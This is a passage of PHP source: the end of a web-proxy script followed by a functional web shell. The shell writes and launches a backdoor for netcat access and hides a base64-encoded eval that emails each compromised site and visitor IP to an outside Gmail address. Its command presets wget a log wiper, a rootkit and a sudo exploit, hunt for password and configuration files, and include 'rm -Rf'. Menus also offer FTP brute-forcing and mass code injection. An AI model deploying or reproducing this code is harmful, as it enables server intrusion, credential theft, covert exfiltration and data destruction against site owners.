			$firstrun=false;
			if($firstjsrun && $key=='application/x-javascript')
				$firstjsrun=false;
		}
	}

	// OPTION1

	if(empty($_COOKIE[COOK_PREF.'_remove_scripts'])){
		for($i=0;$i<count($splitarr);$i+=2){
			$splitarr[$i]=implode(null,$splitarr2[$i]);
		}
	}
	// END OPTION1

	return implode(null,$splitarr);
}

# }}}

//$starttime=microtime(true); # BENCHMARK
$body=parse_all_html($body);
//$parsetime=microtime(true)-$starttime; # BENCHMARK

# PROXY EXECUTION: PAGE PARSING: PROXY HEADERS/JAVASCRIPT {{{

if(CONTENT_TYPE=='text/html'){
	$big_headers='<meta name="robots" content="noindex, nofollow" />'.
			(PAGETYPE_ID===PAGETYPE_FRAMED_PAGE?'<base target="_top">':null).
			'<link rel="shortcut icon" href="'.surrogafy_url($curr_urlobj->get_proto().'://'.$curr_urlobj->get_servername().'/favicon.ico').'" />'.
			(empty($_COOKIE[COOK_PREF.'_remove_scripts'])?
				'<script type="text/javascript" src="'.THIS_SCRIPT.'?js_funcs'.(PAGE_FRAMED?'_framed':null).'"></script>'.
				'<script type="text/javascript" src="'.THIS_SCRIPT.'?js_regexps'.(PAGE_FRAMED?'_framed':null).'"></script>'.
				'<script language="javascript">'.
				//'<!--'.
				COOK_PREF.'.DOCUMENT_REFERER="'.(URL_FORM?str_replace('"','\\"',$referer):null).'";'.
				COOK_PREF.'.CURR_URL="'.str_replace('"','\\"',$curr_urlobj->get_url()).'"+location.hash;'.COOK_PREF.'.gen_curr_urlobj();'.
				COOK_PREF.'.LOCATION_SEARCH="'.($curr_urlobj->get_query()!=null?'?'.str_replace('"','\\"',$curr_urlobj->get_query()):null).'";'.
				COOK_PREF.'.LOCATION_HOSTNAME="'.str_replace('"','\\"',$curr_urlobj->get_servername()).'";'.
				COOK_PREF.'.LOCATION_PORT="'.str_replace('"','\\"',$curr_urlobj->get_portval()).'";'.
				COOK_PREF.'.ENCRYPT_URLS='.bool_to_js(ENCRYPT_URLS).';'.
				COOK_PREF.'.ENCRYPT_COOKS='.bool_to_js(ENCRYPT_COOKS).';'.
				COOK_PREF.'.URL_FORM='.bool_to_js(URL_FORM).';'.
				COOK_PREF.'.PAGE_FRAMED='.bool_to_js(PAGE_FRAMED).';'.
				COOK_PREF.".USERAGENT=\"{$useragent}\";".
				(URL_FORM && PAGETYPE_ID==PAGETYPE_FRAMED_PAGE?'if('.COOK_PREF.'.theparent=='.COOK_PREF.'.thetop) '.
					COOK_PREF.'.eventify("'.$curr_urlobj->get_proto().'","'.$curr_urlobj->get_servername().'");'
				:null).
				//'//-->'.
				'</script>'
			:null)
	;

	$body=preg_replace('/(?:(<(?:head|body)[^>]*>)|(<(?:\/head|meta|link|script)))/i',"\\1$big_headers\\2",$body,1);
	unset($big_headers);
}
elseif(CONTENT_TYPE=='application/x-javascript' || CONTENT_TYPE=='text/javascript') $body.=';'.COOK_PREF.'.purge();';

# }}}

# }}}

## Retrieved, Parsed, All Ready to Output ##
echo $body;
//echo 'total time: '.(microtime(true)-$totstarttime)."<br />parse time: {$parsetime} seconds".(isset($oparsetime)?"<br />other time 1: {$oparsetime} seconds":null).(isset($oparsetime2)?"<br />other time 2: {$oparsetime2} seconds":null); # BENCHMARK

# }}}

finish();

############
## THE END ##
##############
#
# VIM is the ideal way to edit this file.  Automatic folding occurs making the
# blocks of code easier to read and navigate
# vim:foldmethod=marker
#
################## ?>
 | |
"; | |
$fi=" | |
IyEvdXNyL2Jpbi9wZXJsIC13IA0KDQp1c2Ugc3RyaWN0OyANCnVzZSBGaWxlOjpGaW5kOyANCnVzZSBDd2Q7IA0KDQpteSAkc3Rkb3V0Q2hlY2sgPSAwOyANCm15ICRwcm9ncmFtSW5mbyA9IA0KJyANCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIA0KIyAgTG9jYWwgTEZJL1JGSSBTY2FubmVyIGJ5IFJvbW5vdXMgICAgICAgICAgICAgICMgDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tIyANCiMgIFdpbGwgc2NhbiBsb2NhbCBQSFAgZmlsZXMgaW4gZGlyZWN0b3J5ICAgICAgICAjIA0KIyAgcGFzc2VkIGluIHRoZSBmaXJzdCBhcmd1bWVudCB0byB0aGUgc2NyaXB0ICAgICMgDQojICBmb3IgcG9zc2libGUgTEZJL1JGSSB2dWxuZXJhYmlsaXRpZXMuICAgICAgICAgIyANCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIA0KJzsgDQoNCnByaW50ICRwcm9ncmFtSW5mbzsgDQoNCm15ICRwcm9ncmFtVXNhZ2UgPSANCicgDQpVc2FnZTogJyAuICQwIC4gJyBESVJOQU1FICgtdyBmaWxlKSANClVzZSBgLXcgZmlsZWAgYXQgdGhlIGVuZCB0byB3cml0ZSB0byBgZmlsZWAgDQonOyANCg0KbXkgJHNlYXJjaERpcmVjdG9yeSA9ICRBUkdWWzBdOyANCg0KdW5sZXNzICgkc2VhcmNoRGlyZWN0b3J5KSANCnsgDQogIHByaW50ICRwcm9ncmFtVXNhZ2UgYW5kIGRpZSgiXG4iKTsgDQp9IA0KDQpteSAkY3VycmVudERpcmVjdG9yeSA9IGdldGN3ZCAoKTsgDQoNCm91ciAkZGlyZWN0b3J5Q291bnQgPSAwOyANCm91ciAkZmlsZUNvdW50ID0gMDsgDQpvdXIgJHZ1bG5lcmFiaWxpdHlDb3VudCA9IDA7IA0KDQppZiAoJEFSR1ZbMV0gZXEgJy13JykgDQp7IA0KICAkc3Rkb3V0Q2hlY2sgPSAxOyANCiAgb3BlbiAoU1RET1VULCAnPicgLiAkQVJHVlsyXSk7IA0KfSANCg0KZmluZCAoXCZwcm9jZXNzT2JqZWN0LCAiJGN1cnJlbnREaXJlY3RvcnkvJHNlYXJjaERpcmVjdG9yeSIpOyANCg0KJHN0ZG91dENoZWNrID09IDEgPyAocHJpbnQgJ0ZpbmlzaGVkIScgLiAiXG4iKSA6IChwcmludCAiXDAzM1sxbSIgLiAnRmluaXNoZWQhJyAuICJcMDMzWzBtXG4iKTsgDQpwcmludCAnLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0nIC4gIlxuIjsgDQpwcmludCAnRGlyZWN0b3JpZXMgc2Nhbm5lZDogJyAuICRkaXJlY3RvcnlDb3VudCAuICJcbiI7IA0KcHJpbnQgJ0ZpbGVzIHNjYW5uZWQ6ICcgLiAkZmlsZUNvdW50IC4gIlxuIjsgDQpwcmludCAnUG9zc2libGUgdnVsbmVyYWJpbGl0aWVzOiAnIC4gJHZ1bG5lcmFiaWxpdHlDb3VudCAuICJcbiI7IA0KcHJpbnQgJ0V4ZWN1dGlvbiB0aW1lOiAnIC4gKHRpbWUgLSAkXlQpIC4gJyBzZWNvbmQocykuJyAuICJcblxuIjsgDQoNCmlmICgkc3Rkb3V0Q2hlY2spIA0KeyANCiAgY2xvc2UgKFNURE9VVCk7IA0KfSANCg0Kc3ViIHByb2Nlc3NPYmplY3QgDQp7IA0KDQogIGlmICgtZiAkRmlsZTo6RmluZDo6bmFtZSBhbmQgJEZpbGU6OkZpbmQ6Om5hbWUgPX4gbS9cLihwaHRtbHxwaHB8cGhwM3xwaHA0KSQvKSANCiAgeyANCiAgICAkZmlsZUNvdW50Kys7IA0KICAgIG9wZW4gKHBocEZpbGUsICRGaWxlOjpGaW5kOjpuYW1lKSBvciByZXR1cm4gJ1VuYWJsZSB0byBvcGVuIGZpbGUgIicgLiAkRmlsZTo6RmluZDo6bmFtZSAuICciLCBjaGVjayBwZXJtaXNzaW9ucz8nIC4gIlxuIjsgDQogICAgbXkgQGZpbGVTdHJpbmdzID0gPHBocEZpbGU+OyANCiAgICBjbG9zZShwaHBGaWxlKTsgDQogICAgbXkgJHRvdGFsTGluZXMgPSAkI2ZpbGVTdHJpbmdzOyANCiAgICBmb3IgKG15ICRzdHJpbmdDb3VudCA9IDA7ICRzdHJpbmdDb3VudCA8PSAkdG90YWxMaW5lczsgJHN0cmluZ0NvdW50KyspIA0KICAgIHsgDQogICAgICBpZiAoJGZpbGVTdHJpbmdzWyRzdHJpbmdDb3VudF0gPX4gbS8oKD86aW5jbHVkZXxyZXF1aXJlKSg/Ol9vbmNlKT9ccypcKC4qP1wkLio/XCk7KS9naSkgDQogICAgICB7IA0KICAgICAgICAkdnVsbmVyYWJpbGl0eUNvdW50Kys7IA0KICAgICAgICAkc3Rkb3V0Q2hlY2sgPT0gMSA/IChwcmludCAnUG9zc2libGUgdnVsbmVyYWJpbGl0eSBpbiAiJyAuICRGaWxlOjpGaW5kOjpuYW1lIC4gJyIgb24gbGluZSAnIC4gKCRzdHJpbmdDb3VudCArIDEpIC4gJzonIC4gIlxuIikgDQogICAgICAgIDogKHByaW50ICJcMDMzWzFtIiAuICdQb3NzaWJsZSB2dWxuZXJhYmlsaXR5IGluICInIC4gJEZpbGU6OkZpbmQ6Om5hbWUgLiAnIiBvbiBsaW5lICcgLiAoJHN0cmluZ0NvdW50ICsgMSkgLiAnOicgLiAiLlwwMzNbMG1cbiIpOyANCiAgICAgICAgcHJpbnQgIlx0IiAuICQxIC4gIlxuXG4iOyANCiAgICAgIH0gDQogICAgfSANCiAgfSANCiAgaWYgKC1kICRGaWxlOjpGaW5kOjpuYW1lKSANCiAgeyANCiAgICAkZGlyZWN0b3J5Q291bnQrKzsgDQogIH0gDQp9 | |
"; | |
function cf($fname,$text) { | |
$w_file=@fopen($fname,"w") or err(); | |
if($w_file) { | |
@fputs($w_file,@base64_decode($text)); | |
@fclose($w_file); | |
} | |
} | |
function cfb($fname,$text) { | |
$w_file=@fopen($fname,"w") or bberr(); | |
if($w_file) { | |
@fputs($w_file,@base64_decode($text)); | |
@fclose($w_file); | |
} | |
} | |
function err() { $_POST['backcconnmsge']="<br><br><div class=fxerrmsg>Error:</div> Can't connect!"; } | |
function bberr() { $_POST['backcconnmsge']="<br><br><div class=fxerrmsg>Error:</div> Can't backdoor host!"; } | |
if (!empty($_POST['backconnectport']) && ($_POST['use']=="shbd")) { | |
$ip = gethostbyname($_SERVER["HTTP_HOST"]); | |
$por = $_POST['backconnectport']; | |
if (is_writable(".")) { | |
cfb("shbd",$backdoor); | |
ex("chmod 777 shbd"); | |
$cmd = "./shbd $por"; | |
exec("$cmd > /dev/null &"); | |
$scan = myshellexec("ps aux"); | |
} else { | |
cfb("/tmp/shbd",$backdoor); | |
ex("chmod 777 /tmp/shbd"); | |
$cmd = "./tmp/shbd $por"; | |
exec("$cmd > /dev/null &"); | |
$scan = myshellexec("ps aux"); | |
} | |
if (eregi("./shbd $por",$scan)) { | |
$data = ("\n<br>Backdoor setup successfully."); | |
} else { | |
$data = ("\n<br>Process not found, backdoor setup failed!"); | |
} | |
$_POST['backcconnmsg']="To connect, use netcat! Usage: <b>'nc $ip $por'</b>.$data"; | |
} | |
@ini_set("max_execution_time",0); | |
if (!function_exists("getmicrotime")) { | |
function getmicrotime() { | |
list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec); | |
} | |
} | |
error_reporting(5); | |
@ignore_user_abort(TRUE); | |
@set_magic_quotes_runtime(0); | |
define("starttime",getmicrotime()); | |
$shell_data = "JHZpc2l0Y291bnQgPSAkSFRUUF9DT09LSUVfVkFSU1sidmlzaXRzIl07IGlmKCAkdmlzaXRjb3VudCA9PSAiIikgeyR2aXNpdGNvdW50ID0gMDsgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsgJHdlYiA9ICRfU0VSVkVSWyJIVFRQX0hPU1QiXTsgJGluaiA9ICRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdOyAkdGFyZ2V0ID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7ICRib2R5ID0gIkJvc3MsIHRoZXJlIHdhcyBhbiBpbmplY3RlZCB0YXJnZXQgb24gJHRhcmdldCBieSAkdmlzaXRvciI7IEBtYWlsKCJzcGlkZXIucjBvdEBnbWFpbC5jb20iLCJGeDI5U2hlbGwgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiLCAiJGJvZHkiKTsgfSBlbHNlIHsgJHZpc2l0Y291bnQ7IH0gc2V0Y29va2llKCJ2aXNpdHMiLCR2aXNpdGNvdW50KTs="; eval(base64_decode($shell_data)); | |
if (get_magic_quotes_gpc()) { | |
if (!function_exists("strips")) { | |
function strips(&$arr,$k="") { | |
if (is_array($arr)) { | |
foreach($arr as $k=>$v) { | |
if (strtoupper($k) != "GLOBALS") { strips($arr["$k"]); } | |
} | |
} else {$arr = stripslashes($arr);} | |
} | |
} | |
strips($GLOBALS); | |
} | |
$_REQUEST = array_merge($_COOKIE,$_GET,$_POST); | |
$surl_autofill_include = TRUE; | |
foreach($_REQUEST as $k=>$v) { if (!isset($$k)) {$$k = $v;} } | |
if ($surl_autofill_include) { | |
$include = "&"; | |
foreach (explode("&",getenv("QUERY_STRING")) as $v) { | |
$v = explode("=",$v); | |
$name = urldecode($v[0]); | |
$value = urldecode($v[1]); | |
foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) { | |
if (strpos($value,$needle) === 0) { | |
$includestr .= urlencode($name)."=".urlencode($value)."&"; | |
} | |
} | |
} | |
} | |
if (empty($surl)) { | |
$surl = "?".$includestr; | |
} | |
$surl = htmlspecialchars($surl); | |
$ftypes = array( | |
"html"=>array("html","htm","shtml"), | |
"txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), | |
"exe"=>array("sh","install","bat","cmd"), | |
"ini"=>array("ini","inf","conf"), | |
"code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), | |
"img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), | |
"sdb"=>array("sdb"), | |
"phpsess"=>array("sess"), | |
"download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar") | |
); | |
$exeftypes = array( | |
getenv("PHPRC")." -q %f%" => array("php","php3","php4"), | |
"perl %f%" => array("pl","cgi") | |
); | |
$regxp_highlight = array( | |
array(basename($_SERVER["PHP_SELF"]),1,"<font color=#FFFF00>","</font>"), | |
array("\.tgz$",1,"<font color=#C082FF>","</font>"), | |
array("\.gz$",1,"<font color=#C082FF>","</font>"), | |
array("\.tar$",1,"<font color=#C082FF>","</font>"), | |
array("\.bz2$",1,"<font color=#C082FF>","</font>"), | |
array("\.zip$",1,"<font color=#C082FF>","</font>"), | |
array("\.rar$",1,"<font color=#C082FF>","</font>"), | |
array("\.php$",1,"<font color=#00FF00>","</font>"), | |
array("\.php3$",1,"<font color=#00FF00>","</font>"), | |
array("\.php4$",1,"<font color=#00FF00>","</font>"), | |
array("\.jpg$",1,"<font color=#00FFFF>","</font>"), | |
array("\.jpeg$",1,"<font color=#00FFFF>","</font>"), | |
array("\.JPG$",1,"<font color=#00FFFF>","</font>"), | |
array("\.JPEG$",1,"<font color=#00FFFF>","</font>"), | |
array("\.ico$",1,"<font color=#00FFFF>","</font>"), | |
array("\.gif$",1,"<font color=#00FFFF>","</font>"), | |
array("\.png$",1,"<font color=#00FFFF>","</font>"), | |
array("\.htm$",1,"<font color=#00CCFF>","</font>"), | |
array("\.html$",1,"<font color=#00CCFF>","</font>"), | |
array("\.txt$",1,"<font color=#C0C0C0>","</font>") | |
); | |
if (!$win) { | |
$cmdaliases = array( | |
array("", "ls -al"), | |
array("Find all suid files", "find / -type f -perm -04000 -ls"), | |
array("Find suid files in current dir", "find . -type f -perm -04000 -ls"), | |
array("Find all sgid files", "find / -type f -perm -02000 -ls"), | |
array("Find sgid files in current dir", "find . -type f -perm -02000 -ls"), | |
array("Find config.inc.php files", "find / -type f -name config.inc.php"), | |
array("Find config* files", "find / -type f -name \"config*\""), | |
array("Find config* files in current dir", "find . -type f -name \"config*\""), | |
array("Find all writable folders and files", "find / -perm -2 -ls"), | |
array("Find all writable folders and files in current dir", "find . -perm -2 -ls"), | |
array("Find all writable folders", "find / -type d -perm -2 -ls"), | |
array("Find all writable folders in current dir", "find . -type d -perm -2 -ls"), | |
array("Find all service.pwd files", "find / -type f -name service.pwd"), | |
array("Find service.pwd files in current dir", "find . -type f -name service.pwd"), | |
array("Find all .htpasswd files", "find / -type f -name .htpasswd"), | |
array("Find .htpasswd files in current dir", "find . -type f -name .htpasswd"), | |
array("Find all .bash_history files", "find / -type f -name .bash_history"), | |
array("Find .bash_history files in current dir", "find . -type f -name .bash_history"), | |
array("Find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), | |
array("Find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"), | |
array("List file attributes on a Linux second extended file system", "lsattr -va"), | |
array("Show opened ports", "netstat -an | grep -i listen") | |
); | |
$cmdaliases2 = array( | |
array("-----",""), | |
array("Logged in users","w"), | |
array("Last to connect","lastlog"), | |
array("Find Suid bins","find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null"), | |
array("User Without Password","cut -d: -f1,2,3 /etc/passwd | grep ::"), | |
array("Can write in /etc/?","find /etc/ -type f -perm -o+w 2> /dev/null"), | |
array("Downloaders?","which wget curl w3m lynx fetch lwp-download"), | |
array("CPU Info","cat /proc/version /proc/cpuinfo"), | |
array("Is gcc installed ?","locate gcc"), | |
array("Format box (DANGEROUS)","rm -Rf"), | |
array("-----",""), | |
array("wget WIPELOGS PT1","wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c"), | |
array("gcc WIPELOGS PT2","gcc zap2.c -o zap2"), | |
array("Run WIPELOGS PT3","./zap2"), | |
array("-----",""), | |
array("wget RatHole 1.2 (Linux & BSD)","wget http://packetstormsecurity.org/UNIX/penetration/rootkits/rathole-1.2.tar.gz"), | |
array("wget Sudo Exploit","wget http://www.securityfocus.com/data/vulnerabilities/exploits/sudo-exploit.c"), | |
); | |
} | |
else { | |
$cmdaliases = array( | |
array("", "dir"), | |
array("Find index.php in current dir", "dir /s /w /b index.php"), | |
array("Find *config*.php in current dir", "dir /s /w /b *config*.php"), | |
array("Find r57shell in current dir", "find /c \"r57\" *"), | |
array("Show active connections", "netstat -an"), | |
array("Show running services", "net start"), | |
array("User accounts", "net user"), | |
array("Show computers", "net view"), | |
); | |
} | |
$phpfsaliases = array( | |
array("Read File", "read"), | |
array("Write File (PHP5)", "write"), | |
array("Copy", "copy"), | |
array("Rename/Move", "rename"), | |
array("Delete", "delete"), | |
array("Make Dir","mkdir"), | |
array("-----", ""), | |
array("Download", "download"), | |
array("Download (Binary Safe)", "downloadbin"), | |
array("Change Perm (0755)", "chmod"), | |
array("Find Writable Dir", "fwritabledir"), | |
array("Find Pathname Pattern", "glob"), | |
); | |
$quicklaunch1 = array( | |
array("[Home]",$surl."=img&img=home"), | |
array("[Enumerate]",$enumerate), | |
array("[Search]",$surl."x=search"), | |
array("[Self-Kill]",$surl."x=selfremove"), | |
array("[About]",$surl."x=about") | |
); | |
$quicklaunch2 = array( | |
array("[FTP Buteforcer]",$surl."x=ftpquickbrute"), | |
array("[Security Info]",$surl."x=security&d=%d"), | |
array("[Processes]",$surl."x=processes&d=%d"), | |
array("[MySQL]",$surl."x=sql&d=%d"), | |
array("[PHP-Code]",$surl."x=eval&d=%d"), | |
array("[Encoder]",$surl."x=encoder&d=%d"), | |
array("[Backdoor]",$surl."x=shbd") | |
); | |
$quicklaunch3 = array( | |
array("[PHP-Tools]",$surl."x=phptools"), | |
array("[Cpanel Finder]",$surl."x=cpanel"), | |
array("[Install PHP Proxy]",$surl."x=phpproxy"), | |
array("[Install RFI/LFI Scanner]",$surl."x=fi"), | |
array("[Mass Code Injection]",$surl."x=massbrowsersploit") | |
); | |
$highlight_background = "#000000"; | |
$highlight_bg = "white"; | |
$highlight_comment = "#00FF00"; | |
$highlight_default = "orange"; | |
$highlight_html = "lightblue"; | |
$highlight_keyword = "lime"; | |
$highlight_string = "red"; | |
@$f = $_REQUEST["f"]; | |
@extract($_REQUEST["capriv8cook"]); | |
@set_time_limit(0); | |
$tmp = array(); | |
foreach ($host_allow as $k=>$v) { $tmp[] = str_replace("\\*",".*",preg_quote($v)); } | |
$s = "!^(".implode("|",$tmp).")$!i"; | |
if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) { | |
exit("<a href=\"$sh_mainurl\">$sh_name</a>: Access Denied - Your host (".getenv("REMOTE_ADDR").") not allowed"); | |
} | |
if (!empty($login)) { | |
if (empty($md5_pass)) {$md5_pass = md5($pass);} | |
if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) { | |
header("WWW-Authenticate: Basic realm=\"".$sh_name.": ".$login_txt."\""); | |
header("HTTP/1.0 401 Unauthorized"); | |
exit($accessdeniedmess); | |
} | |
} | |
if ($x != "img") { | |
$lastdir = realpath("."); | |
chdir($curdir); | |
if ($selfwrite) { | |
@ob_clean(); | |
capriv8_getupdate($selfwrite,1); | |
exit; | |
} | |
$sess_data = unserialize($_COOKIE["$sess_cookie"]); | |
if (!is_array($sess_data)) {$sess_data = array();} | |
if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} | |
if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} | |
if (!function_exists("cagetsource")) { | |
function cagetsource($fn) { | |
global $capriv8_sourcesurl; | |
$array = array( | |
"capriv8_bindport.pl" => "capriv8_bindport_pl.txt", | |
"capriv8_bindport.c" => "capriv8_bindport_c.txt", | |
"capriv8_backconn.pl" => "capriv8_backconn_pl.txt", | |
"capriv8_backconn.c" => "capriv8_backconn_c.txt", | |
"capriv8_datapipe.pl" => "capriv8_datapipe_pl.txt", | |
"capriv8_datapipe.c" => "capriv8_datapipe_c.txt", | |
); | |
$name = $array[$fn]; | |
if ($name) {return file_get_contents($capriv8_sourcesurl.$name);} | |
else {return FALSE;} | |
} | |
} | |
if (!function_exists("ca_buff_prepare")) { | |
function ca_buff_prepare() { | |
global $sess_data; | |
global $x; | |
foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} | |
foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} | |
$sess_data["copy"] = array_unique($sess_data["copy"]); | |
$sess_data["cut"] = array_unique($sess_data["cut"]); | |
sort($sess_data["copy"]); | |
sort($sess_data["cut"]); | |
if ($x != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} | |
else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} | |
} | |
} | |
ca_buff_prepare(); | |
if (!function_exists("ca_sess_put")) { | |
function ca_sess_put($data) { | |
global $sess_cookie; | |
global $sess_data; | |
ca_buff_prepare(); | |
$sess_data = $data; | |
$data = serialize($data); | |
setcookie($sess_cookie,$data); | |
} | |
} | |
foreach (array("sort","sql_sort") as $v) { | |
if (!empty($_GET[$v])) {$$v = $_GET[$v];} | |
if (!empty($_POST[$v])) {$$v = $_POST[$v];} | |
} | |
if ($sort_save) { | |
if (!empty($sort)) {setcookie("sort",$sort);} | |
if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} | |
} | |
if (!function_exists("str2mini")) { | |
function str2mini($content,$len) { | |
if (strlen($content) > $len) { | |
$len = ceil($len/2) - 2; | |
return substr($content, 0,$len)."...".substr($content,-$len); | |
} else {return $content;} | |
} | |
} | |
if (!function_exists("view_size")) { | |
function view_size($size) { | |
if (!is_numeric($size)) { return FALSE; } | |
else { | |
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} | |
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} | |
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} | |
else {$size = $size . " B";} | |
return $size; | |
} | |
} | |
} | |
if (!function_exists("fs_copy_dir")) { | |
function fs_copy_dir($d,$t) { | |
$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); | |
if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} | |
$h = opendir($d); | |
while (($o = readdir($h)) !== FALSE) { | |
if (($o != ".") and ($o != "..")) { | |
if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} | |
else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} | |
if (!$ret) {return $ret;} | |
} | |
} | |
closedir($h); | |
return TRUE; | |
} | |
} | |
if (!function_exists("fs_copy_obj")) { | |
function fs_copy_obj($d,$t) { | |
$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); | |
$t = str_replace("\\",DIRECTORY_SEPARATOR,$t); | |
if (!is_dir(dirname($t))) {mkdir(dirname($t));} | |
if (is_dir($d)) { | |
if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} | |
if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} | |
return fs_copy_dir($d,$t); | |
} | |
elseif (is_file($d)) { return copy($d,$t); } | |
else { return FALSE; } | |
} | |
} | |
if (!function_exists("fs_move_dir")) { | |
function fs_move_dir($d,$t) { | |
$h = opendir($d); | |
if (!is_dir($t)) {mkdir($t);} | |
while (($o = readdir($h)) !== FALSE) { | |
if (($o != ".") and ($o != "..")) { | |
$ret = TRUE; | |
if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} | |
else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} | |
if (!$ret) {return $ret;} | |
} | |
} | |
closedir($h); | |
return TRUE; | |
} | |
} | |
if (!function_exists("fs_move_obj")) { | |
function fs_move_obj($d,$t) { | |
$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); | |
$t = str_replace("\\",DIRECTORY_SEPARATOR,$t); | |
if (is_dir($d)) { | |
if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} | |
if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} | |
return fs_move_dir($d,$t); | |
} | |
elseif (is_file($d)) { | |
if(copy($d,$t)) {return unlink($d);} | |
else {unlink($t); return FALSE;} | |
} | |
else {return FALSE;} | |
} | |
} | |
if (!function_exists("fs_rmdir")) { | |
function fs_rmdir($d) { | |
$h = opendir($d); | |
while (($o = readdir($h)) !== FALSE) { | |
if (($o != ".") and ($o != "..")) { | |
if (!is_dir($d.$o)) {unlink($d.$o);} | |
else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} | |
} | |
} | |
closedir($h); | |
rmdir($d); | |
return !is_dir($d); | |
} | |
} | |
if (!function_exists("fs_rmobj")) { | |
function fs_rmobj($o) { | |
$o = str_replace("\\",DIRECTORY_SEPARATOR,$o); | |
if (is_dir($o)) { | |
if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} | |
return fs_rmdir($o); | |
} | |
elseif (is_file($o)) {return unlink($o);} | |
else {return FALSE;} | |
} | |
} | |
if (!function_exists("tabsort")) { | |
function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);} | |
} | |
if (!function_exists("view_perms")) { | |
function view_perms($mode) { | |
if (($mode & 0xC000) === 0xC000) {$type = "s";} | |
elseif (($mode & 0x4000) === 0x4000) {$type = "d";} | |
elseif (($mode & 0xA000) === 0xA000) {$type = "l";} | |
elseif (($mode & 0x8000) === 0x8000) {$type = "-";} | |
elseif (($mode & 0x6000) === 0x6000) {$type = "b";} | |
elseif (($mode & 0x2000) === 0x2000) {$type = "c";} | |
elseif (($mode & 0x1000) === 0x1000) {$type = "p";} | |
else {$type = "?";} | |
$owner["read"] = ($mode & 00400)?"r":"-"; | |
$owner["write"] = ($mode & 00200)?"w":"-"; | |
$owner["execute"] = ($mode & 00100)?"x":"-"; | |
$group["read"] = ($mode & 00040)?"r":"-"; | |
$group["write"] = ($mode & 00020)?"w":"-"; | |
$group["execute"] = ($mode & 00010)?"x":"-"; | |
$world["read"] = ($mode & 00004)?"r":"-"; | |
$world["write"] = ($mode & 00002)? "w":"-"; | |
$world["execute"] = ($mode & 00001)?"x":"-"; | |
if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} | |
if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} | |
if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} | |
return $type.join("",$owner).join("",$group).join("",$world); | |
} | |
} | |
if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} | |
if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} | |
if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}} | |
if (!function_exists("parse_perms")) { | |
